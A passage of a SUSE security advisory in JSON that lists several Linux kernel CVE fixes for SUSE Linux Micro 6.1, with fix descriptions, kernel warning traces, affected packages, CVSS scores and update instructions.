"url": "https://www.suse.com/security/cve/CVE-2023-54006"
},
{
"category": "external",
"summary": "SUSE Bug 1255591 for CVE-2023-54006",
"url": "https://bugzilla.suse.com/1255591"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54006"
},
{
"cve": "CVE-2023-54008",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54008"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio_vdpa: build affinity masks conditionally\n\nWe try to build affinity mask via create_affinity_masks()\nunconditionally which may lead several issues:\n\n- the affinity mask is not used for parent without affinity support\n (only VDUSE support the affinity now)\n- the logic of create_affinity_masks() might not work for devices\n other than block. For example it\u0027s not rare in the networking device\n where the number of queues could exceed the number of CPUs. Such\n case breaks the current affinity logic which is based on\n group_cpus_evenly() who assumes the number of CPUs are not less than\n the number of groups. This can trigger a warning[1]:\n\n\tif (ret \u003e= 0)\n\t\tWARN_ON(nr_present + nr_others \u003c numgrps);\n\nFixing this by only build the affinity masks only when\n\n- Driver passes affinity descriptor, driver like virtio-blk can make\n sure to limit the number of queues when it exceeds the number of CPUs\n- Parent support affinity setting config ops\n\nThis help to avoid the warning. More optimizations could be done on\ntop.\n\n[1]\n[ 682.146655] WARNING: CPU: 6 PID: 1550 at lib/group_cpus.c:400 group_cpus_evenly+0x1aa/0x1c0\n[ 682.146668] CPU: 6 PID: 1550 Comm: vdpa Not tainted 6.5.0-rc5jason+ #79\n[ 682.146671] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.2-0-gea1b7a073390-prebuilt.qemu.org 04/01/2014\n[ 682.146673] RIP: 0010:group_cpus_evenly+0x1aa/0x1c0\n[ 682.146676] Code: 4c 89 e0 5b 5d 41 5c 41 5d 41 5e c3 cc cc cc cc e8 1b c4 74 ff 48 89 ef e8 13 ac 98 ff 4c 89 e7 45 31 e4 e8 08 ac 98 ff eb c2 \u003c0f\u003e 0b eb b6 e8 fd 05 c3 00 45 31 e4 eb e5 cc cc cc cc cc cc cc cc\n[ 682.146679] RSP: 0018:ffffc9000215f498 EFLAGS: 00010293\n[ 682.146682] RAX: 000000000001f1e0 RBX: 0000000000000041 RCX: 0000000000000000\n[ 682.146684] RDX: ffff888109922058 RSI: 0000000000000041 RDI: 0000000000000030\n[ 682.146686] RBP: ffff888109922058 R08: ffffc9000215f498 R09: ffffc9000215f4a0\n[ 682.146687] R10: 00000000000198d0 R11: 0000000000000030 R12: ffff888107e02800\n[ 682.146689] R13: 0000000000000030 R14: 0000000000000030 R15: 0000000000000041\n[ 682.146692] FS: 00007fef52315740(0000) GS:ffff888237380000(0000) knlGS:0000000000000000\n[ 682.146695] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 682.146696] CR2: 00007fef52509000 CR3: 0000000110dbc004 CR4: 0000000000370ee0\n[ 682.146698] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[ 682.146700] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[ 682.146701] Call Trace:\n[ 682.146703] \u003cTASK\u003e\n[ 682.146705] ? __warn+0x7b/0x130\n[ 682.146709] ? group_cpus_evenly+0x1aa/0x1c0\n[ 682.146712] ? report_bug+0x1c8/0x1e0\n[ 682.146717] ? handle_bug+0x3c/0x70\n[ 682.146721] ? exc_invalid_op+0x14/0x70\n[ 682.146723] ? asm_exc_invalid_op+0x16/0x20\n[ 682.146727] ? group_cpus_evenly+0x1aa/0x1c0\n[ 682.146729] ? group_cpus_evenly+0x15c/0x1c0\n[ 682.146731] create_affinity_masks+0xaf/0x1a0\n[ 682.146735] virtio_vdpa_find_vqs+0x83/0x1d0\n[ 682.146738] ? __pfx_default_calc_sets+0x10/0x10\n[ 682.146742] virtnet_find_vqs+0x1f0/0x370\n[ 682.146747] virtnet_probe+0x501/0xcd0\n[ 682.146749] ? vp_modern_get_status+0x12/0x20\n[ 682.146751] ? get_cap_addr.isra.0+0x10/0xc0\n[ 682.146754] virtio_dev_probe+0x1af/0x260\n[ 682.146759] really_probe+0x1a5/0x410",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54008",
"url": "https://www.suse.com/security/cve/CVE-2023-54008"
},
{
"category": "external",
"summary": "SUSE Bug 1255630 for CVE-2023-54008",
"url": "https://bugzilla.suse.com/1255630"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54008"
},
{
"cve": "CVE-2023-54013",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54013"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ninterconnect: Fix locking for runpm vs reclaim\n\nFor cases where icc_bw_set() can be called in callbaths that could\ndeadlock against shrinker/reclaim, such as runpm resume, we need to\ndecouple the icc locking. Introduce a new icc_bw_lock for cases where\nwe need to serialize bw aggregation and update to decouple that from\npaths that require memory allocation such as node/link creation/\ndestruction.\n\nFixes this lockdep splat:\n\n ======================================================\n WARNING: possible circular locking dependency detected\n 6.2.0-rc8-debug+ #554 Not tainted\n ------------------------------------------------------\n ring0/132 is trying to acquire lock:\n ffffff80871916d0 (\u0026gmu-\u003elock){+.+.}-{3:3}, at: a6xx_pm_resume+0xf0/0x234\n\n but task is already holding lock:\n ffffffdb5aee57e8 (dma_fence_map){++++}-{0:0}, at: msm_job_run+0x68/0x150\n\n which lock already depends on the new lock.\n\n the existing dependency chain (in reverse order) is:\n\n -\u003e #4 (dma_fence_map){++++}-{0:0}:\n __dma_fence_might_wait+0x74/0xc0\n dma_resv_lockdep+0x1f4/0x2f4\n do_one_initcall+0x104/0x2bc\n kernel_init_freeable+0x344/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #3 (mmu_notifier_invalidate_range_start){+.+.}-{0:0}:\n fs_reclaim_acquire+0x80/0xa8\n slab_pre_alloc_hook.constprop.0+0x40/0x25c\n __kmem_cache_alloc_node+0x60/0x1cc\n __kmalloc+0xd8/0x100\n topology_parse_cpu_capacity+0x8c/0x178\n get_cpu_for_node+0x88/0xc4\n parse_cluster+0x1b0/0x28c\n parse_cluster+0x8c/0x28c\n init_cpu_topology+0x168/0x188\n smp_prepare_cpus+0x24/0xf8\n kernel_init_freeable+0x18c/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #2 (fs_reclaim){+.+.}-{0:0}:\n __fs_reclaim_acquire+0x3c/0x48\n fs_reclaim_acquire+0x54/0xa8\n slab_pre_alloc_hook.constprop.0+0x40/0x25c\n __kmem_cache_alloc_node+0x60/0x1cc\n __kmalloc+0xd8/0x100\n kzalloc.constprop.0+0x14/0x20\n icc_node_create_nolock+0x4c/0xc4\n icc_node_create+0x38/0x58\n qcom_icc_rpmh_probe+0x1b8/0x248\n platform_probe+0x70/0xc4\n really_probe+0x158/0x290\n __driver_probe_device+0xc8/0xe0\n driver_probe_device+0x44/0x100\n __driver_attach+0xf8/0x108\n bus_for_each_dev+0x78/0xc4\n driver_attach+0x2c/0x38\n bus_add_driver+0xd0/0x1d8\n driver_register+0xbc/0xf8\n __platform_driver_register+0x30/0x3c\n qnoc_driver_init+0x24/0x30\n do_one_initcall+0x104/0x2bc\n kernel_init_freeable+0x344/0x34c\n kernel_init+0x30/0x134\n ret_from_fork+0x10/0x20\n\n -\u003e #1 (icc_lock){+.+.}-{3:3}:\n __mutex_lock+0xcc/0x3c8\n mutex_lock_nested+0x30/0x44\n icc_set_bw+0x88/0x2b4\n _set_opp_bw+0x8c/0xd8\n _set_opp+0x19c/0x300\n dev_pm_opp_set_opp+0x84/0x94\n a6xx_gmu_resume+0x18c/0x804\n a6xx_pm_resume+0xf8/0x234\n adreno_runtime_resume+0x2c/0x38\n pm_generic_runtime_resume+0x30/0x44\n __rpm_callback+0x15c/0x174\n rpm_callback+0x78/0x7c\n rpm_resume+0x318/0x524\n __pm_runtime_resume+0x78/0xbc\n adreno_load_gpu+0xc4/0x17c\n msm_open+0x50/0x120\n drm_file_alloc+0x17c/0x228\n drm_open_helper+0x74/0x118\n drm_open+0xa0/0x144\n drm_stub_open+0xd4/0xe4\n chrdev_open+0x1b8/0x1e4\n do_dentry_open+0x2f8/0x38c\n vfs_open+0x34/0x40\n path_openat+0x64c/0x7b4\n do_filp_open+0x54/0xc4\n do_sys_openat2+0x9c/0x100\n do_sys_open+0x50/0x7c\n __arm64_sys_openat+0x28/0x34\n invoke_syscall+0x8c/0x128\n el0_svc_common.constprop.0+0xa0/0x11c\n do_el0_\n---truncated---",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54013",
"url": "https://www.suse.com/security/cve/CVE-2023-54013"
},
{
"category": "external",
"summary": "SUSE Bug 1256280 for CVE-2023-54013",
"url": "https://bugzilla.suse.com/1256280"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54013"
},
{
"cve": "CVE-2023-54014",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54014"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: qla2xxx: Check valid rport returned by fc_bsg_to_rport()\n\nKlocwork reported warning of rport maybe NULL and will be dereferenced.\nrport returned by call to fc_bsg_to_rport() could be NULL and dereferenced.\n\nCheck valid rport returned by fc_bsg_to_rport().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54014",
"url": "https://www.suse.com/security/cve/CVE-2023-54014"
},
{
"category": "external",
"summary": "SUSE Bug 1256300 for CVE-2023-54014",
"url": "https://bugzilla.suse.com/1256300"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-54014"
},
{
"cve": "CVE-2023-54016",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54016"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: ath12k: Fix memory leak in rx_desc and tx_desc\n\nCurrently when ath12k_dp_cc_desc_init() is called we allocate\nmemory to rx_descs and tx_descs. In ath12k_dp_cc_cleanup(), during\ndescriptor cleanup rx_descs and tx_descs memory is not freed.\n\nThis is cause of memory leak. These allocated memory should be\nfreed in ath12k_dp_cc_cleanup.\n\nIn ath12k_dp_cc_desc_init(), we can save base address of rx_descs\nand tx_descs. In ath12k_dp_cc_cleanup(), we can free rx_descs and\ntx_descs memory using their base address.\n\nTested-on: QCN9274 hw2.0 PCI WLAN.WBE.1.0.1-00029-QCAHKSWPL_SILICONZ-1",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54016",
"url": "https://www.suse.com/security/cve/CVE-2023-54016"
},
{
"category": "external",
"summary": "SUSE Bug 1256279 for CVE-2023-54016",
"url": "https://bugzilla.suse.com/1256279"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
